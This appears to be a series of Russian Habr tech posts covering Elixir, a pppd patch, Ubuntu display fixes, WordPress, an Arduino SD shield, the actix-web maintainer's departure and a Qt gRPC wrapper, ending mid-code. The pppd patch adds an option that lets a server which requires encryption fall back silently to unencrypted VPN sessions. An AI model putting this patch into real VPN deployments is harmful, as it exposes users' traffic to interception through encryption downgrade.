*disclaimer: %username%, прежде чем делать выводы насчет того, что умеет, а что не умеет elixir, просьба глазами пройтись хотя бы по [readme](https://github.com/josevalim/elixir/blob/master/README.md).*
Elixir — язык программирования, работающий поверх Erlang. Как Erlang, это — функциональный язык со строгими вычислениями, однократным присвоением и динамической типизацией, созданный, чтобы поддерживать распределенные, отказоустойчивые, безостановочные приложения с горячей заменой кода. Elixir позволяет Вам вызывать модули Erlang без необходимости преобразовать типы данных, поэтому нет никакой потери в производительности при вызове кода Erlang.
Основное различие между Elixir и Erlang — синтаксис и объектная ориентированность. Elixir обеспечивает очень простую объектную модель и синтаксис, большей частью основанный на Ruby.
В настоящее время главной задачей является разработка стандартной библиотеки. Большая часть существующей стандартной библиотеки написана на самом Elixir, и Вам не нужно знать Erlang, чтобы внести свой вклад в ее развитие. Достаточно будет знакомства с принципами OTP.
Чтобы начать работу, для начала нужно клонировать репозиторий к себе на компьютер, скомпилировать и проверить его:
```
$ git clone https://github.com/josevalim/elixir.git
$ cd elixir
$ make test
$ bin/elixir -v
Elixir 0.1.0
```
Комментарии в Elixir, как и в Erlang, обозначаются через “%”:
```
% This is a commented line
```
Далее, “% =>” показывают значение выражения:
```
1 + 1 % => 2
```
Elixir поддерживает целые и дробные числа:
```
2 + 15 % => 17
- 13 * 10 % => -130
1986 - 1985 % => 1
5 / 2 % => 2.5
4 / 2 % => 2.0
```
Как в Ruby, любая конструкция является объектом. Мы можем вызывать методы у чисел:
```
-1.abs % => 1
5.div(2) % => 2
%surprise !
1.+(2) % => 3
```
Атомы в Elixir называются Symbols (как в Ruby). Но синтиксис позаимствован у Lisp (Jose объяснил это в твиттере тем, что хочет ":" использовать в словарях):
```
'atom
'Atom
'atom_without_spaces
'"Atom with Spaces"
```
Списки являются наиболее полезной структурой в Elixir (как и в любом другом функциональном языке), могу содержать все, что угодно и имеют набор методов:
```
% Some list with elements
['atom, 1, 2, 3, { 'some, 'tuple }]
% An empty list
[]
[1, 2, 3].length % => 3
['a, 'b, 'c][1] % => 'b
[1, 2, 3] + [4, 5, 6] % => [1,2,3,4,5,6]
```
Списки в Erlang и Elixir реализованы как связные списки, поэтому предварительное добавление элементов происходит намного быстрее, чем последующее:
```
list = [2,3,4]
% Don't do this:
[1] + [2,3,4] % => [1,2,3,4]
[0,1] + [2,3,4] % => [0,1,2,3,4]
% Do this instead:
[1|list] % => [1,2,3,4]
[0,1|list] % => [0,1,2,3,4]
```
Настоящую силу списков получаешь, когда используешь их вместе с функциями
```
[1, 2, 3].map do (x)
x * 2
end % => [2, 4, 6]
[1, 2, 3].foldl 0, do (x, acc)
acc + x
end % => 6
```
Строки в Erlang представлены списком символов:
```
"hello" == [104, 101, 108, 108, 111]
```
Это накладно, поскольку каждый символ занимает 8 байт памяти (не бит!). Elixir реализует строки, в виде utf8 бинарных строк:
```
% The famous "hello world" string
"hello world"
% A string converted to its underlying binary:
"hello".to_bin % => <<[104, 101, 108, 108, 111]>>
% A string converted to a char list:
"hello".to_char_list % => [104, 101, 108, 108, 111]
% Strings are UTF-8
"Arrow ⇧ up".length % => 10
```
Это существенное изменение. Строки являются единственными объектами, требующими преобразования:
```
% Converting a string_from_erlang to Elixir's String
String.new string_from_erlang
% Where string_from_erlang is either a binary:
<<[104, 101, 108, 108, 111]>>
% Or a char_list:
[104, 101, 108, 108, 111]
% Converting a string_from_elixir to Erlang
"string_from_elixir".to_bin
"string_from_elixir".to_char_list
```
Наконец, строки поддерживают интерполяцию:
```
"string #{'with} interpolation" % => "string with interpolation"
"1 + 1 = #{1 + 1}" % => "1 + 1 = 2"
```
Функции являются важной частью Elixir, как и любого другого функционального языка. Функции можно создавать с помощью «do» или "->":
```
my_function = do
1 + 2
end
my_function() % => 3
another_function = ->
1 * 2
end
another_function() % => 2
```
Как и Erlang, Elixir поддерживает Pattern matching и единичное присваивание.
```
% Let's bound the variable x to 'foo
x = 'foo
% Now let's match a tuple with other tuple.
% Since x is already bound, we are comparing x with 'baz and it will fail:
{ x, y } = { 'baz, 'bar }
% In this case, we compare 'x with 'foo and it matches.
% Since y is unbound, we assign 'bar to it:
{ x, y } = { 'foo, 'bar }
x % => 'foo
y % => 'bar
[h|t] = [1,2,3]
h % => 1
t % => [2,3]
% Raises an error because h was already assigned to 1 and 1 does not match 2
[h|t1] = [2,3,4]
```
Как и в Eralng, pattern matching используется в сигнатурах функций:
```
module Math
def fibonacci(0)
0
end
def fibonacci(1)
1
end
def fibonacci(n)
fibonacci(n - 1) + fibonacci(n - 2)
end
end
Math.fibonacci(0) % => 0
Math.fibonacci(1) % => 1
Math.fibonacci(3) % => 2
Math.fibonacci(10) % => 55
```
Вызов методов Erlang весьма тривиален:
```
% Accessing the is_atom BIF from Erlang.
% This is the same as `is_atom(foo)` in Erlang.
Erlang.is_atom('foo) % => true
% Accessing the function delete from module lists.
% This is the same as `lists:member(1, [1,2,3])` in Erlang.
Erlang.lists.member(1, [1,2,3]) % => true
```
Объектная модель Elixir имеет некоторые аспекты:
* Динамический выбор реализации — когда вызывается метод, объект сам выбирает, какой код выполнить
* Mixin'ы — объекты не содержат методов. Все методы запакованы в модули, которые подмешиваются в объекты.
* Инкапсуляция — методы могут быть public, protected или private.
* Открытая рекурсия — объекты имеют специальную переменную self, которая позволяет вызвать другие методы объекта не затрагивая цепочку вызовов.
* Рефлексия — Elixir способен просматривать и модифицировать структуру объекта во времени исполнения.
```
object Person
def constructor(name, age)
{ 'name: name, 'age: age }
end
def name
@name
end
def age
@age
end
def name(value)
self.set_ivar('name, value)
end
end
person = Person.name('john, 24)
another_person = person.name('john_doe)
person.name % => 'john
person.age % => 24
another_person.name % => 'johh_doe
another_person.age % => 24
```
Это описание малой части возможностей Elixir. В репозитории опубликована отличная обзорная [документация](https://github.com/josevalim/elixir/blob/master/README.md). Ролик ниже иллюстрирует небольшой пример работы языка: | https://habr.com/ru/post/115372/ | null | ru | null |
# VPN-сервер на Linux — решение проблемы с MPPE и клиентами, не поддерживающими шифрование данных
Так уж исторически сложилось, что связка pptpd + pppd — довольно популярное решение для раздачи интернета в локальных сетях, во многом благодаря наличию клиента pptp в windows начиная с 98 «из коробки». Более того, этот клиент поддерживает протокол шифрования [MPPE](http://www.ietf.org/rfc/rfc3078.txt) который начиная с windows 2000 включен для новых соединений по умолчанию.
pppd радостно идет нам навстречу, также поддерживая этот протокол, но делает это весьма своеобразно:
цитата из README.MPPE:
*if you turn it on, all other compression options are disabled and MPPE \*must\* be negotiated successfully in both directions (CCP is unidirectional) or the link will be disconnected. I think this is reasonable since, if you want encryption, you want encryption. That is, I am not convinced that optional encryption is useful*
На практике сие означает, что включив поддержку mppe (опциями +mppe или require-mppe) вы не сможете обслужить подключения клиентов, не поддерживающих этого протокола. Разработчики pppd считают это вполне себе правильным поведением, заявляя что «опциональное шифрование народу не нужно»
Но что делать тем, у которого помимо виндовых клиентов есть еще и немало подключений дешевых аппаратных роутеров, которые попросту не поддерживают MPPE? Отключать шифрование для всех? Или убеждать клиентов что им нужен роутер в 5 раз дороже?
Прежде чем ударяться в такие крайности, было принято решение починить эту «фичу» и за пару часиков вдумчивого изучения исходников pppd был рожден такой вот патч:
(тестировался на ppp-2.4.4rel-10.1 из debian lenny)
`diff -ruNp ppp-2.4.4.orig/pppd/auth.c ppp-2.4.4/pppd/auth.c
--- ppp-2.4.4.orig/pppd/auth.c 2006-06-18 14:26:00.000000000 +0300
+++ ppp-2.4.4/pppd/auth.c 2008-02-13 18:24:08.000000000 +0200
@@ -875,7 +875,7 @@ start_networks(unit)
*/
ecp_required = ecp_gotoptions[unit].required;
mppe_required = ccp_gotoptions[unit].mppe;
- if (!ecp_required && !mppe_required)
+ if (!ecp_required && (!mppe_required || allow_mppe_fallback))
continue_networks(unit);
}
diff -ruNp ppp-2.4.4.orig/pppd/ccp.c ppp-2.4.4/pppd/ccp.c
--- ppp-2.4.4.orig/pppd/ccp.c 2005-07-09 03:23:05.000000000 +0300
+++ ppp-2.4.4/pppd/ccp.c 2008-02-13 18:31:16.000000000 +0200
@@ -156,6 +156,11 @@ static option_t ccp_option_list[] = {
"allow MPPE stateful mode", OPT_PRIO },
{ "nomppe-stateful", o_bool, &refuse_mppe_stateful,
"disallow MPPE stateful mode", OPT_PRIO | 1 },
+
+ /* allow falling back to unencrypted connection mode */
+ { "mppe-optional", o_bool, &allow_mppe_fallback,
+ "allow falling back to unencryped connection mode", OPT_PRIO | 1 },
+
#endif /* MPPE */
{ NULL }
@@ -516,9 +521,14 @@ ccp_protrej(unit)
#ifdef MPPE
if (ccp_gotoptions[unit].mppe) {
- error("MPPE required but peer negotiation failed");
- lcp_close(unit, "MPPE required but peer negotiation failed");
- }
+ if(!allow_mppe_fallback) {
+ error("MPPE required but peer negotiation failed");
+ lcp_close(unit, "MPPE required but peer negotiation failed");
+ } else {
+ error("MPPE required but peer negotiation failed.");
+ error("Falling back and disabling MPPE");
+ }
+ }
#endif
}
@@ -1004,11 +1014,17 @@ ccp_rejci(f, p, len)
#ifdef MPPE
if (go->mppe && len >= CILEN_MPPE
&& p[0] == CI_MPPE && p[1] == CILEN_MPPE) {
- error("MPPE required but peer refused");
- lcp_close(f->unit, "MPPE required but peer refused");
- p += CILEN_MPPE;
- len -= CILEN_MPPE;
+ if(!allow_mppe_fallback) {
+ error("MPPE required but peer refused. Closing LCP");
+ lcp_close(f->unit, "MPPE required but peer refused");
+ } else {
+ try.mppe = 0;
+ error("MPPE required but peer refused.");
+ error("Falling back and disabling MPPE");
+ }
}
+ p += CILEN_MPPE;
+ len -= CILEN_MPPE;
#endif
if (go->deflate_correct && len >= CILEN_DEFLATE
&& p[0] == CI_DEFLATE && p[1] == CILEN_DEFLATE) {
diff -ruNp ppp-2.4.4.orig/pppd/ccp.h ppp-2.4.4/pppd/ccp.h
--- ppp-2.4.4.orig/pppd/ccp.h 2004-11-04 12:02:26.000000000 +0200
+++ ppp-2.4.4/pppd/ccp.h 2008-02-13 19:03:43.000000000 +0200
@@ -43,6 +43,8 @@ typedef struct ccp_options {
short method; /* code for chosen compression method */
} ccp_options;
+bool allow_mppe_fallback;
+
extern fsm ccp_fsm[];
extern ccp_options ccp_wantoptions[];
extern ccp_options ccp_gotoptions[];
@@ -50,3 +52,5 @@ extern ccp_options ccp_allowoptions[];
extern ccp_options ccp_hisoptions[];
extern struct protent ccp_protent;
+
+
diff -ruNp ppp-2.4.4.orig/pppd/pppd.8 ppp-2.4.4/pppd/pppd.8
--- ppp-2.4.4.orig/pppd/pppd.8 2006-06-16 03:01:23.000000000 +0300
+++ ppp-2.4.4/pppd/pppd.8 2008-02-13 18:41:31.000000000 +0200
@@ -770,6 +770,9 @@ available under Linux.
.B nomppe
Disables MPPE (Microsoft Point to Point Encryption). This is the default.
.TP
+.B mppe-optional
+Makes MPPE optional, allowing both MPPE and non-MPPE clients
+.TP
.B nomppe\-40
Disable 40-bit encryption with MPPE.
.TP`
После наложения и пересборки — в конфиге pppd пишем
require-mppe
mppe-optional
и наблюдаем нормальную работу vpn как с включенным шифрованием на стороне клиента, так и без.
уже собранные пакеты для debian lenny (возможно, подойдут и для ubuntu) могу выложить по запросу | https://habr.com/ru/post/56496/ | null | ru | null |
# Ubuntu 9.10 и catalyst: исправляем медленное развёртывание окна
В свежеустановленной ubuntu у ~~счастливых~~^Wпользователей проприетарного драйвера от ati(catalyst), при включенных эффектах, очень долго разворачивается окно. Для исправления нужно поставить «иксы» с патчем *nobackflill*(отключается инициализация фона). Это легко сделать:
1. В */etc/apt/sources.list* добавить:
`deb ppa.launchpad.net/launchpad-weyland/xserver-nobackfill/ubuntu karmic main`
2. Выполнить:
`sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 16E70E3E
sudo aptitude update
sudo aptitude upgrade`
3. Перезагрузить X сервер
`на welinux.ru` | https://habr.com/ru/post/74671/ | null | ru | null |
# Как сделать pda версию WordPress без плагинов
Существует множество способов сделать **pda версию блога**, созданного на движке **WordPress**. Плагины и прочее… Но всё оно мне не подходило, так как настраивать в них какие-то функции или внешний вид — невозможно! Рыться в этом коде можно очень долго, а толку в итоге не будет.
Мне нужно было сделать просто. На субдомен повесить тот же движок, с той же базой, только с другим скином, который удобно бы читался с экрана смартфона или коммуникатора.
В интернете я ничего не нашёл на эту тему… Чтож… оставалось надеяться на свои силы :)
“Если долго мучаться — что-нибудь получится.” гласит народная мудрость… Делюсь с народом короткой инструкцией, как привязать pda(wap) версию на субдомен, но оставить у двух блогов одну базу на двоих:
Для этого нужно сделать **полную копию WP** вместе с плагинами на субдомен. Лёгкую тему положить в папку с таким-же именем что и основная.
*ваш\_сайт/wp-content/themes/best\_theme
pda.ваш\_сайт/wp-content/themes/best\_theme*
Далее настроить **wp-config.php** на субдомене, точнее добавить строчки:
`define('WP_SITEURL', 'http://pda.towap.info');
define('WP_HOME', 'http://pda.towap.info');`
Естествено настройки подключения к бд одинаковые.
Папку uploads можно не копировать, а просто создать символическую ссылку на неё.
Таким образом решается эта задача… То, что вышло можно наблюдать тут: [ссылка](http://pda.towap.info)
И, если кому понадобится, ссылка на упрощённый вариант темы, чтобы разобраться что к чему: [скачать тему](http://towap.info/blog_skin/WP-wap_v1.0b.zip) | https://habr.com/ru/post/37192/ | null | ru | null |
# Самодельный SD Card Shield для Arduino
Приветствую, %username%!
Подумал на днях, что для своего будущего 2х ядерного коптера (да и мало ли других проектов) неплохо бы потом сделать еще и черный ящик ([GPS](http://habrahabr.ru/blogs/arduino/109354)), а для этого надо много памяти и EEPROM не поможет, а поэтому стоит купить или сделать SD шилд для Arduino.
Купить — [дороговато для такой мелочи](http://www.seeedstudio.com/depot/sd-card-shield-for-arduino-v21-p-492.html) и долго ждать пока пришлют, поэтому гуглим и находим что народ то клепает свои шилды, для этого нам понадобится всего 6 резисторов, переходник/разъем для карты памяти и сама карточка (заработало с картами SD и SDHC, отформатированными в FAT16 и FAT32).
Схемка довольно простая ([читаем подробнее тут](http://www.arduino.cc/cgi-bin/yabb2/YaBB.pl?num=1235125412/0)):

резисторы нужны для [понижения напряжения](http://ru.wikipedia.org/wiki/%D0%94%D0%B5%D0%BB%D0%B8%D1%82%D0%B5%D0%BB%D1%8C_%D0%BD%D0%B0%D0%BF%D1%80%D1%8F%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F) с 5 до [примерно 3.4 вольт](http://circuitfun.wordpress.com/2009/02/24/53/)
спаял, получилось вот такая красота:
[](http://dl.dropbox.com/u/1638929/arduino/sd_diy_shield.jpg)
код взял из стандартых примеров Arduino, только немного подправил пины под вариант схемы (измененные места отмечены жирным, заодно перевел на русский местами):
```
/*
SD card read/write
Этот пример показывает как читать и писать данные на и из файла на SD карточке
Схема подключения
* SD карточка подсоеденина к SPI шине:
** MOSI - pin 11
** MISO - pin 12
** CLK - pin 13
** CS - pin 10
создано Ноябрь 2010
David A. Mellis
обновлено 2 Декабря 2010
Tom Igoe
и переведено в Марте 2011
Gleb Devyatkin
Этот пример кода - народное достояние.
*/
#include
File myFile;
void setup()
{
Serial.begin(9600);
Serial.print("Initializing SD card...");
// On the Ethernet Shield, CS is pin 4. It's set as an output by default.
// Note that even if it's not used as the CS pin, the hardware SS pin
// (10 on most Arduino boards, 53 on the Mega) must be left as an output
// or the SD library functions will not work.
pinMode(10, OUTPUT);
if (!SD.begin(10)) {
Serial.println("initialization failed!");
return;
}
Serial.println("initialization done.");
// открываем файл. заметте, что только один файл может быть открыт за раз,
// поэтому вы должны закрыть этот, чтобы открыть другой.
myFile = SD.open("test.txt", FILE\_WRITE);
// если файл нормально открылся, запишем в него:
if (myFile) {
Serial.print("Writing to test.txt...");
myFile.println("testing 1, 2, 3.");
// закрываем файл:
myFile.close();
Serial.println("done.");
} else {
// а если он не открылся, то печатаем сообщение об ошибке:
Serial.println("error opening test.txt");
}
// откроем файл снова, для чтения:
myFile = SD.open("test.txt");
if (myFile) {
Serial.println("test.txt:");
// читаем из файла, пока не достигнем конца файла:
while (myFile.available()) {
Serial.write(myFile.read());
}
// закрываем файл:
myFile.close();
} else {
// а если не открылся, то пишем об ошибке:
Serial.println("error opening test.txt");
}
}
void loop()
{
// больше делать нечего, но тут мог бы быть ваш код
}
```
Поле отработки этого кода — на вашей карточке будет файлик TEST.TXT с содержимым «testing 1, 2, 3.» (или много раз эта строка, если код запускался не один раз, что немного странно, так как FILE\_WRITE должен был перезаписать файл) | https://habr.com/ru/post/115176/ | null | ru | null |
# Неблагодарный opensource: разработчик самого быстрого веб сервера удалил его репозиторий

Краткая суть ситуации: наш соотечественник [fafhrd91](https://habr.com/ru/users/fafhrd91/) на протяжении 3 лет практически самостоятельно (см. кдпв) писал `actix-web` — [один из популярнейших крейтов](https://crates.io/crates/actix-web) в инфраструктуре раста, [лидер в большинстве различных бенчмарков](https://www.techempower.com/benchmarks/#section=data-r18&hw=ph&test=update), и за это время подвергался как минимум трём волнам гонений за "неправильное использование раста". После последнего раза автор психанул, и перенес репозиторий к себе в аккаунт с пометкой "Планирую скрыть репозиторий". Конечно, куча людей сразу наделало зеркал и бекапов, но на мой взгляд это не сильно исправляет ситуацию.
На месте репозитория автор оставил единственный postmortem, который я ниже и цитирую целиком:
> Another day, another "unsafe shitstorm”, I guess I get used to it.
>
>
>
> It is interesting how easy to move comment out of context and how hard to comment with very clear intention (especially if you are not native speaker) What was the patch? It was very strait forward, simple, uncreative change, intention was just to remove unsafe not to fix existing code. I believe software development is one of the most creative work we do, and creativity is part of why we love software development, why it is fun. Especially if you combine it with real world projects constraints. “creative constrains” could be source of very interesting solutions. Being on the edge of your abilities is super fun. So uncreative change felt boring (oh! And author gave up copyright claims for that patch (a bit irony and sarcasm)). I’ve never used unsafe unintentionally, I use it because I believe usage is safe. There was no any malicious intentions. I believed it held mutable aliasing invariant and I was very happy that someone found real problem. I wanted to solve the problem, just with a bit of creativity. And use RefCell solution only if it would be not possible to solve it with any other way. Btw, I like the solution I found, it is in master and solves the problem at least one from the issue. If you want to push boundaries you have to touch this boundaries and sometimes you push too hard.
>
>
>
> Be a maintainer of large open source project is not a fun task. You alway face with rude and hate, everyone knows better how to build software, nobody wants to do home work and read docs and think a bit and very few provide any help. Seems everyone believes there is large team behind actix with unlimited time and budget. (Btw thanks to everyone who provided prs and other help!) For example, async/await took three weeks 12 hours/day work stint, quite exhausting, and what happened after release, I started to receive complaints that docs are not updated and i have to go fix my shit. Encouraging. You could notice after each unsafe shitstorm, i started to spend less and less time with the community. You felt betrayed after you put so much effort and then to hear all this shit comments, even if you understand that that is usual internet behavior. Anyway, removing issue was a stupid idea. But I was pissed off with last two personal comments, especially while sitting and thinking how to solve the problem. I am sorry for doing that.
>
>
>
> It’s been three years since I started actix project (time flies). I learnt a lot, i meet new people, I found language that I really like and want to use it fulltime, I found fun job. But damage to the project's reputation is done and I don’t think it is possible to recover. Actix always will be “shit full of UB” and “benchmark cheater”. (Btw, with tfb benchmark I just wanted to push rust to the limits, I wanted it to be on the top, I didn’t want to push other rust frameworks down.) Everything started with actix, then actix-web and then actix-net. It took a lot of time to design api and architecture. Each of this projects was rewritten from scratch at least 4-5 time. I hope I expanded some boundaries and found few new patterns, I hope other developers will check source code and find inspiration to move even further. Nowadays supporting actix project is not fun, and be part of rust community is not fun as well.
>
>
>
> I am done with open source.
>
>
>
> P.S. I moved actix-net and actix-web project to my personal github account. I will make decision during next couple days what to do. I don’t want to see the project becomes ghost of what it was. Maintainers must understand how everything work, but don’t anyone who does and those who could are busy with other projects. At the moment I am planing to make repos private and then delete them (will remove benchmarks as well), unless others suggest better ideas.
>
>
>
> Everything has to come to the end. It was fun trip but now is time to move on. Life should be fun.
Как это выглядит с моей стороны: очередной безопасник (член команды RustSec) создал issue "ваш код содержит UB", автор попросил привести пример который триггерит его, безопасник такой код предоставил, после чего автор исправил использование публичным апи приватного так, чтобы UB не возникало. На вопрос "почему бы не убрать unsafe" автор ответил, что это может иметь последствия для производительности, поэтому сейчас он просто фиксит симптом, чтобы подумать, как это исправить без просадки производительности (напомню, что по рейтингам techempower `actix-web` является самым быстрым), или неудобного апи (оно у актикса на удивление хорошее). После чего на него обрушился вал обвинений в том, что он *неправильно* пользуется языком, и вообще, не должен никогда на нем писать.
Итог — удаление проекта, окончательное выгорание автора и [нежелание иметь дело с неблагодарным opensource впредь](https://twitter.com/fafhrd91/status/1218135374339301378):

В поддержку автора написали авторы кортимы ([Клабник](https://words.steveklabnik.com/a-sad-day-for-rust), [Лодочник](https://news.ycombinator.com/item?id=22075507), [Раф](https://raphlinus.github.io/rust/2020/01/18/soundness-pledge.html)).
Для меня ситуация очень неприятная. У нас на проекте используется актикс-веб из-за уникального сочетания скорости, удобства и всё-таки надежности. А теперь основной ментейнер покинул проект, и если за 3 года не нашлось никого кто написал бы больше 3000 строк кода, то откуда такой человек найдется сейчас?..
Upd. Сохраненная переписка (оригинальный issue был удален автором репозитория): <https://gist.github.com/pcr910303/d7722a26499d0e9d2f9034a06f2433b4>
Upd. 2
> Я [Kai Ren] подрезюмирую, что мы имеем на данный момент по вопросу.
>
> 1. На данный момент нет никаких "их" и "наших" форков. И никакого core team actix тоже, по факту, нет. Основные мейнтейнеры из actix не имеют пока никакого внятного видение/решения проблемы. То есть ситуации actix vs fork не намечается ни в каком виде (разве что Николай через какое-то время решит продолжить своё дело в противовес всем). Core мейнтейнеры actix'а, тем не менее тоже не согласны с "закатом эпохи" и скооперировались в Discord канале (ссылка есть в закрепе) для обсуждения конкретных действий по ситуации. Под core мейнтейнерами я подразумеваю JohnTitor, Dowwie, Mitsuhiko (Armin Ronacher) и Robe Ede.
>
> Других инициатив по проекту, если они и есть, то пока не видно и не слышно нигде (ни в Reddit, ни на Rust forum, ни в чатах actix Gitter, ни соответствующих issues GitHub).
> 2. Если Николай не воскресит проект (на что надеяться глупо), то все заинтересованные в вопросе (core maintainer'ы и наша группа) согласны, что дальнейшим движением должен быть хард-форк проекта.
> 3. Какое при этом должно быть видение проекта, каковы его приоритеты и вектор движения. Каково название будет иметь новый проект, пока ничего не решено точно. Это будет точно обсуждаться сегодня в Discord'е. Из то, что пока точно удалось понять, maintainer'ы не всегда были довольны линией Николая и вроде как склоняются к safety over performance парадигме. Но это не точно, надо всё это ковырять и обсуждать.
> 4. @sovasergey подсейвил все репы actix под временным рабочим название cathodic на GitHub.
>
>
>
>
Upd. 3: автор наконец ответил на сложившуюся ситуацию, он возвращает код в оригинальный репозиторий и передает владение одному из ментейнеров:
> I realized, a lot of people depends on actix. And it would be unfair to just delete repos. I promote [JohnTitor](https://habr.com/ru/users/johntitor/) to project leader. He did very good job helping me for the last year. I hope new community of developers emerge. And good luck!
<https://github.com/actix/actix-web/issues/1289> | https://habr.com/ru/post/484436/ | null | ru | null |
# Заставим клавишу Switch Display на ноутбуке работать по-своему!
Вам нравится как работает gnome-display-properties (это тот, который «Система -> Параметры -> Мониторы») и клавиша переключения монитора на ноутбуке? Да? Тогда можете проходить мимо, топик не для вас :)
Самое большое неудобство этого аплета — невозможность вручную настроить [порядок переключения режимов](http://live.gnome.org/RandR#Handling_of_the_XF86Display_hotkey): current configuration -> mirror -> extended desktop -> laptop only -> external only -> и снова current configuration. Не слишком удобно, не правда ли?.. Вот эту задачу мы и будем решать.
#### Задача
— заставить клавишу Switch Display переключать всего два режима:
1) экран ноутбука включен, внешний монитор отключен
2) экран ноутбука отключен, внешний монитор включен
— сделать так, чтобы ноутбук не уходил в режим ожидания по захлопыванию крышки, если включен внешний экран
#### Решение
1. Для начала определимся с переключением мониторов. Делать мы это будем с помощью консольной утилиты xrandr.
— включаем внешний монитор и отключаем внутренний:
`xrandr --output VGA --auto && xrandr --output LVDS --off`
— выключаем внешний и включаем экран ноутбука:
`xrandr --output LVDS --auto && xrandr --output VGA --off`
Обратите внимание что имена **VGA и LVDS могут отличатся** от системы к системе. Это могут быть: LVDS/VGA, LVDS1/VGA1, LVDS-1/VGA-1 и т.д. Чтобы посмотреть какие имена используются у вас в системе просто наберите xrandr без параметров.
2. Следующим шагом нам нужно повесить эти команды на клавишу переключения мониторов.
В первую очередь мы отключим текущее поведение данной клавиши, которое перехватывается плагином xrandr из gnome-settings-daemon:
`gconftool --set /apps/gnome_settings_daemon/plugins/xrandr/active --type bool false`
**Примечание**: тоже самое можно сделать используя графический интерфейс с помощью gconf-editor
Затем создаём новую привязку к клавише XF86Display:
`gconftool --set /desktop/gnome/keybindings/switch-display/name --type string switch-display
gconftool --set /desktop/gnome/keybindings/switch-display/binding --type string XF86Display
gconftool --set /desktop/gnome/keybindings/switch-display/action --type string switch-display.sh`
**Примечание**: тоже самое можно сделать используя графический интерфейс с помощью gnome-keybinding-properties или gconf-editor
Теперь эта клавиша должна запускать switch-display.sh, но ничего не происходит, т.к. скрипта с таким названием пока нет.
3. Создаём скрипт переключения.
Используя тот же xrandr мы будем определять включен ли экран ноутбука и в зависимости от результата выполнять переключение. Здесь же мы будем отключать и включать ждущий режим.
```
#!/bin/sh
LVDS=LVDS1 # could be LVDS, LVDS-1 or something else
VGA=VGA1 # could be VGA, VGA-1 or something else
# Check if LVDS is on
xrandr | grep -q "$LVDS connected (" && LVDS_IS_ON=0 || LVDS_IS_ON=1
# Switch displays
if [ $LVDS_IS_ON -eq 1 ]; then
# VGA
xrandr --output $VGA --auto && xrandr --output $LVDS --off
# Disable auto-sleep on lid close
gconftool --set /apps/gnome-power-manager/buttons/lid_ac nothing --type string && \
gconftool --set /apps/gnome-power-manager/buttons/lid_battery nothing --type string
else
# LVDS
xrandr --output $LVDS --auto && xrandr --output $VGA --off
# Enable auto-sleep on lid close
gconftool --set /apps/gnome-power-manager/buttons/lid_ac suspend --type string && \
gconftool --set /apps/gnome-power-manager/buttons/lid_battery suspend --type string
fi
```
Необходимо создать файл с текстом данного скрипта, назвать его switch-display.sh, поместить в директорию ~/bin (если директории ~/bin нет, нужно её создать) и дать права на выполнение.
4. Если директории ~/bin у вас раньше не было, то перед тем как всё заработает вам необходимо будет завершить сеанс и войти в систему снова.
5. Вот теперь всё готово, можете проверять!
#### Примечания
— Момет первый — все настройки мы делали для текущего пользователя, это значит, что такое переключение не будет работать как у других пользоватей системы, так и на экране входа в систему. Кроме того, так как мы не используем в данном случае ACPI (как, собственно, это делает и стандартный плагин xrandr), на заблокированном экране клавиша переключения так же работать не будет.
— Момент второй — чтобы вернуть стандартное поведение клавиши необходимо выполнить следующие команды:
`gconftool --unset /desktop/gnome/keybindings/switch-display/binding
gconftool --unset /desktop/gnome/keybindings/switch-display/action
gconftool --unset /desktop/gnome/keybindings/switch-display/name
gconftool --unset /apps/gnome_settings_daemon/plugins/xrandr/active`
**Всё вышеописанное проверено в Ubuntu 10.04 и Ubuntu 11.04.** | https://habr.com/ru/post/120782/ | null | ru | null |
# Qt обертка вокруг фреймворка gRPC в C++
Всем привет. Сегодня мы рассмотрим, как можно связать фреймворк gRPC в C++ и библиотеку Qt. В статье приведен код, обобщающий использование всех четырех режимов взаимодействия в gRPC. Помимо этого, приведен код, позволяющий использовать gRPC через сигналы и слоты Qt. Статья может быть интересна в первую очередь Qt разработчикам, заинтересованных в использовании gRPC. Тем не менее, обобщение четырех режимов работы gRPC написано на C++ без использования Qt, что позволит адаптировать код разработчикам, не связанных с Qt. Всех заинтересовавшихся прошу под кат.
Предыстория
-----------
Около полугода назад на мне висело два проекта, использующих клиентскую и серверную части gRPC. Оба проекта падали в продакшене. Эти проекты писали разработчики, которые уже уволились. Радовало только то, что я принимал активное участие в написании кода сервера и клиента gRPC. Но это было около года назад. Поэтому, как водится, пришлось разбираться со всем с нуля.
Код сервера gRPC писался с расчетом на то, что будет в дальнейшем генерироваться по .proto файлу. Код был написан неплохо. Однако, сервер обладал одним большим недостатком: к нему мог подключиться только один клиент.
Клиент gRPC был написан просто ужасно.
С кодом клиента и сервера gRPC я разобрался только спустя несколько дней. И понял, что возьми я какой-нибудь проект на пару недель, с сервером и клиентом gRPC пришлось бы разбираться заново.
Именно тогда я решил, что самое время написать и отладить клиент и сервер gRPC так, чтобы:
* Можно было спокойно спать по ночам;
* Не нужно было вспоминать, как это работает каждый раз, когда нужно написать клиента или сервер gRPC;
* Можно было использовать написанных клиента и сервера gRPC в других проектах.
При написании кода я руководствовался следующими требованиями:
* И клиент и сервер gRPC могут работать с использованием сигналов и слотов библиотеки Qt естественным образом;
* Код клиента и сервера gRPC не нужно исправлять при изменении .proto файла;
* Клиент gRPC должен уметь сообщить клиентскому коду состояние соединения с сервером.
Структура статьи следующая. Сначала будет краткий обзор результатов работы с клиентским кодом и небольшими пояснениями к нему. К конце обзора ссылка на репозиторий. Дальше будут общие вещи по архитектуре. Затем описание кода сервера и клиента (то, что под капотом) и заключение.
Краткий обзор
-------------
В качестве .proto файла был использован простейший pingproto.proto файл, в котором определены RPC всех видов взаимодействия:
```
syntax = "proto3";
package pingpong;
service ping
{
rpc SayHello (PingRequest) returns (PingReply) {}
rpc GladToSeeMe(PingRequest) returns (stream PingReply){}
rpc GladToSeeYou(stream PingRequest) returns (PingReply){}
rpc BothGladToSee(stream PingRequest) returns (stream PingReply){}
}
message PingRequest
{
string name = 1;
string message = 2;
}
message PingReply
{
string message = 1;
}
```
Файл pingpong.proto с точностью до имен повторяет файл helloworld.proto из статьи об [асинхронных режимах работы gRPC в C++](https://habr.com/post/340758/).
В итоге написанный сервер можно использовать примерно так:
```
class A: public QObject
{
Q_OBJECT;
QpingServerService pingservice;
public:
A()
{
bool is_ok;
is_ok = connect(&pingservice, SIGNAL(SayHelloRequest(SayHelloCallData*)), this, SLOT(onSayHello(SayHelloCallData*))); assert(is_ok);
is_ok = connect(&pingservice, SIGNAL(GladToSeeMeRequest(GladToSeeMeCallData*)), this, SLOT(onGladToSeeMe(GladToSeeMeCallData*))); assert(is_ok);
